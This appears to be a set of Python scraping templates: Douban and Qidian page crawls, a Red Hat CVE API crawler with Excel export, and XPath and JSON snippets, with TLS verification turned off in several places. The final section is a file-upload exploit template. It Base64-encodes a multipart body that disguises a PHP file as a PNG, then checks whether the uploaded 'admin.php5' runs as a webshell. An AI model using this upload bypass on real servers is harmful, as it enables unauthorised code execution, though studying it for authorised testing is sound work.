1. for 循环控制URL变化
# Listing offsets requested from the Douban Top 250 page: 0, 25, 50, 75, 100.
page_offsets = range(0, 101, 25)

# One listing URL per offset; only the ``start`` query parameter changes.
urls = [f'https://movie.douban.com/top250?start={start}' for start in page_offsets]
2. XPath 爬取信息
# Download the page and parse the returned HTML into an lxml element tree.
# ``url`` and ``headers`` must already be defined by the surrounding script.
res = requests.get(url=url, headers=headers)
e = etree.HTML(res.text)

# Both expressions walk the <li> entries of the <ol> below the element whose
# id is "content"; each query returns a list of text nodes.
name_xpath = '//*[@id="content"]/div/div[1]/ol/li/div/div/div/a/span[1]/text()'
author_xpath = '//*[@id="content"]/div/div[1]/ol/li/div/div[2]/div[2]/p[1]/text()[1]'

name = e.xpath(name_xpath)      # text of the first <span> inside each entry's link
author = e.xpath(author_xpath)  # first text node of the first <p> in each entry
3. 提取 JSON 数据
# Fetch the record; verify=False switches off TLS certificate verification.
res = requests.get(url = url,headers=headers,verify=False)
# Decode the response body as JSON.
json_data = res.json()
# NOTE(review): this excerpt stops before any except/finally clause and has
# lost its indentation, so it is not runnable on its own; the complete version
# of this logic is get_cve_info() in section 4.
try:
# One iteration per entry in the first "object" list of the
# field_cve_releases_txt field.
for i in range(len(json_data['field_cve_releases_txt']['und'][0]['object'])):
# The appended value does not depend on i: the value stored under
# field_cve_cvss3_base_score is added to ``score`` once per release entry.
score += [json_data['field_cve_cvss3_base_score']['und'][0]['value']]
print(score)
4. Red Hat 爬虫
import xlsxwriter
import pandas as pd
import requests
import re
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Browser-like User-Agent sent with the requests made by this script.
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'

# Holders used by get_cve_id() for the links and CVE ids found in the
# search results.
cve_urls, cve_ids = [], []

# Parallel result columns filled by get_cve_info() and written out by
# write_xlsx(): position n of every list belongs to the same spreadsheet row.
severitys, packages, cveId, score, description = [], [], [], [], []
def get_cve_info(cve):
    """Fetch one CVE record from Red Hat and append its RHEL 8 rows.

    Step 2 of the crawl.  The record is downloaded from
    ``https://access.redhat.com/api/redhat_node/<cve>.json``.  For every
    release entry whose product is exactly ``'Red Hat Enterprise Linux 8'``
    one value is appended to each of the module-level lists ``cveId``,
    ``score``, ``severitys``, ``packages`` and ``description``, so the lists
    stay aligned row by row.

    If the request fails, the body is not valid JSON, or an expected field is
    missing, the CVE id is appended to ``Error.txt`` and a placeholder row
    (the CVE id followed by ``"Error"`` in every other column) is recorded
    instead, so one bad record does not abort the whole crawl.

    :param cve: CVE identifier used to build the record URL.
    :return: None
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
    }
    url = 'https://access.redhat.com/api/redhat_node/' + cve + '.json'
    print('#' * 60)
    print(url)
    time.sleep(1)  # pause one second before every request
    try:
        # The request and the JSON decoding live inside the try block so that
        # a network failure or a non-JSON reply is logged like any other bad
        # record.  verify=False disables TLS certificate verification.
        res = requests.get(url=url, headers=headers, verify=False, timeout=30)
        json_data = res.json()
        for release in json_data['field_cve_releases_txt']['und'][0]['object']:
            # Resolve every column before touching the result lists: a missing
            # field then raises here and can never leave the lists misaligned.
            # Only the presence of each field is required; empty values are
            # accepted as they are.
            title = json_data['title']
            base_score = json_data['field_cve_cvss3_base_score']['und'][0]['value']
            severity = json_data['field_cve_threat_severity_text']['und'][0]['value']
            package = release['package']
            details = json_data['field_cve_details_text']['und'][0]['value']
            if release['product'] != 'Red Hat Enterprise Linux 8':
                continue
            cveId.append(title)
            print(cveId)
            score.append(base_score)
            print(score)
            severitys.append(severity)
            print(severitys)
            packages.append(package)
            print(packages)
            description.append(details)
    except (requests.RequestException, ValueError, KeyError, IndexError, TypeError):
        # RequestException: network/HTTP failure; ValueError: body is not JSON;
        # KeyError/IndexError/TypeError: the record lacks an expected field or
        # the field has an unexpected shape.
        print(f"This {cve} Error!")
        with open('Error.txt', 'a', encoding='utf-8') as f:
            f.write(cve + '\n')
        cveId.append(cve)
        score.append("Error")
        severitys.append("Error")
        packages.append("Error")
        description.append("Error")
    else:
        print("Success!")
def get_cve_id(pages=range(1, 6)):
    """Walk the Red Hat CVE Database search results and process every CVE.

    Step 1 of the crawl:
      (1) request each search-result page as JSON and take the entries of its
          ``highlighting`` object (presumably keyed by the document link --
          confirm against a live response);
      (2) extract the CVE id from each entry with a regular expression;
      (3) pass each id to ``get_cve_info``.

    Every link and CVE id seen is also appended to the module-level lists
    ``cve_urls`` and ``cve_ids``.

    :param pages: 1-based result page numbers to crawl; each page holds ten
        rows.  Defaults to pages 1-5.  Pass a different range to re-crawl
        another part of the listing.
    :return: None
    """
    # Compiled once; the capture group is everything that follows "cve/".
    cve_pattern = re.compile(r".*cve/(.*).*")
    urls = [
        f"https://access.redhat.com/hydra/rest/search/kcs?facet=true&facet.field=cve_threatSeverity&facet.mincount=1&facet.range=%7B!ex%3Date%7Dcve_publicDate&facet.range.end=NOW&facet.range.gap=%2B1YEAR&facet.range.start=NOW%2FYEAR-15YEARS&fl=id,cve_threatSeverity,cve_publicDate,view_uri,allTitle,cve_details&fq=documentKind:(%22Cve%22)&hl=true&hl.fl=abstract&hl.simple.post=%253C%252Fmark%253E&hl.simple.pre=%253Cmark%253E&p={p}&q=*:*&rows=10&sort=cve_publicDate+desc&start={(p-1)*10}"
        for p in pages
    ]
    for url in urls:
        print(url)
        # verify=False disables TLS certificate verification.
        res = requests.get(url=url, headers=headers, verify=False, timeout=30)
        json_data = res.json()
        page_links = list(json_data['highlighting'])
        # Accumulate instead of rebinding, so the module-level lists describe
        # the whole crawl rather than only the last page / last link.
        cve_urls.extend(page_links)
        for link in page_links:
            found = cve_pattern.findall(link)
            cve_ids.extend(found)
            for cve in found:
                print(cve)
                get_cve_info(cve)
def write_xlsx():
    """Write the collected CVE columns to ``redhat_8.17.xlsx``, then de-duplicate.

    Creates a workbook with a single worksheet named ``sheet1``: a heading
    row in row 1 and the module-level lists ``cveId``, ``description``,
    ``score``, ``severitys`` and ``packages`` as columns A-E starting at
    row 2.  After the workbook is closed, ``del_same()`` is called.

    :return: None
    """
    headings = ['CVE', '描述', 'CVSS分数', '严重等级', '组件']
    # Top cell of each data column paired with the list written below it.
    columns = (
        ('A2', cveId),
        ('B2', description),
        ('C2', score),
        ('D2', severitys),
        ('E2', packages),
    )
    # The context manager closes the workbook on exit, including when one of
    # the writes raises, instead of leaving it open.
    with xlsxwriter.Workbook('redhat_{}.xlsx'.format('8.17')) as workbook:
        worksheet = workbook.add_worksheet('sheet1')
        worksheet.write_row('A1', headings)
        for top_cell, values in columns:
            worksheet.write_column(top_cell, values)
    del_same()
def del_same(source='redhat_8.17.xlsx', target='redhat_8.17_del.xlsx'):
    """Remove duplicate rows from the exported sheet and save the result.

    Reads worksheet ``sheet1`` of ``source`` with the openpyxl engine, drops
    rows that are exact duplicates of an earlier row, prints the remaining
    rows and writes them to ``target``.

    :param source: workbook to read.  Defaults to the relative file name that
        ``write_xlsx()`` writes, so the function works from any working
        directory instead of one fixed absolute path.
    :param target: workbook that receives the de-duplicated rows.
    :return: None
    """
    data = pd.read_excel(source, sheet_name='sheet1', engine="openpyxl")
    # Two separator lines are printed ahead of the table.
    print('*' * 40)
    print('*' * 40)
    no_re_row = data.drop_duplicates()
    print(no_re_row)
    no_re_row.to_excel(target)
# Script entry point: crawl the CVE data first, then export it to Excel.
if __name__ == '__main__':
    get_cve_id()
    write_xlsx()
5. XPath 模板
from lxml import etree
import requests
import xlsxwriter
# Scrape results shared between paqu() (which fills them) and write_xlsx()
# (which writes them out): novel titles and their authors.
names, authors = [], []
def paqu():
    """Scrape page 2 of the Qidian recommendation ranking.

    Downloads the page, extracts the text of every ``<h4><a>`` element into
    the module-level ``names`` and the text of every ``<p><a class="name">``
    element into the module-level ``authors``, and prints them pairwise as
    ``name : author``.

    :return: the list stored in ``names``.
    """
    global names, authors
    url = "https://www.qidian.com/rank/recom?page=2"
    # Placeholder header values; replace them with a real User-Agent / Cookie.
    headers = {
        'User-Agent': 'self-defind-user-agent',
        'Cookie': 'name=self-define-cookies-in header'
    }
    response = requests.get(url, headers=headers, timeout=30)
    e = etree.HTML(response.text)
    names = e.xpath('//h4/a/text()')
    authors = e.xpath('//p/a[@class="name"]/text()')
    # zip() stops at the shorter list, so a page where the two queries return
    # different numbers of matches no longer raises IndexError while printing.
    for title, writer in zip(names, authors):
        print(title, ":", writer)
    return names
def write_xlsx():
    """Write the scraped titles and authors to ``shuju.xlsx``.

    Creates a workbook with a single worksheet named ``sheet1``: a heading
    row in row 1, the module-level ``names`` in column A and ``authors`` in
    column B, both starting at row 2.

    :return: None
    """
    headings = ['小说名', ' 作者']
    # The context manager closes the workbook on exit, including when one of
    # the writes raises, instead of leaving it open.
    with xlsxwriter.Workbook('shuju.xlsx') as workbook:
        worksheet = workbook.add_worksheet('sheet1')
        worksheet.write_row('A1', headings)
        worksheet.write_column('A2', names)
        worksheet.write_column('B2', authors)
# Run the scrape as soon as this snippet is executed.
# NOTE(review): this section defines write_xlsx() but never calls it, so
# shuju.xlsx is not produced unless it is invoked separately -- confirm
# whether that is intended.
paqu()
6. POST 包传递模板
import base64
import requests
# Request headers shared by the calls in upload_exp().  The Content-Type
# declares a multipart/form-data body with a fixed boundary string.
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'
headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------225704804512407048061351782404'
def upload_exp():
    """POST a pre-built request body and check the follow-up page.

    Template for replaying a recorded POST request.  Intended only for
    systems you are authorized to test.

    The body is stored as a Base64 string and decoded to bytes before it is
    sent to ``url_upload`` through the local proxy on port 8080.  A GET
    request to ``url_check`` follows, and the outcome is printed depending on
    whether the text ``phpinfo`` appears in that response.

    Request-level failures (connection error, timeout, ...) are reported as
    ``upload error!``; any other exception propagates to the caller.

    :return: None
    """
    proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
    url_upload = "http://xx.xx.xx.xx:41672/upload.php"
    data = base64.b64decode("T3JpZ2luOiBodHRwOi8vMjE5LjE1My40OS4yMjg6NDE2NzIKQ29ubmVjdGlvbjogY2xvc2UKUmVmZXJlcjogaHR0cDovLzIxOS4xNTMuNDkuMjI4OjQxNjcyLwpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNTcwNDgwNDUxMjQwNzA0ODA2MTM1MTc4MjQwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwZmlsZSI7IGZpbGVuYW1lPSJhZG1pbi5waHA1IgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwoKPD9waHAgcGhwaW5mbygpOz8+Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI1NzA0ODA0NTEyNDA3MDQ4MDYxMzUxNzgyNDA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoKw4PCpMOCwrjDgsKKw4PCpMOCwrzDgsKgw4PCpsOCwpbDgsKHw4PCpMOCwrvDgsK2Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI1NzA0ODA0NTEyNDA3MDQ4MDYxMzUxNzgyNDA0LS0K")
    try:
        # The POST response itself is not inspected; only the follow-up GET is.
        requests.post(url=url_upload, headers=headers, data=data, verify=False, timeout=10, proxies=proxies)
        url_check = "http://xx.xx.xx.xx/uploads/admin.php5"
        res_2 = requests.get(url=url_check, headers=headers)
        if "phpinfo" in res_2.text:
            print("一句话上传成功!")
        else:
            print("上传失败!")
    except requests.RequestException:
        # Only request failures are handled here, so Ctrl-C and programming
        # errors are no longer hidden behind the generic message.
        print("upload error!")
# Script entry point: run the upload check when executed directly.
if __name__ == '__main__':
    upload_exp()
|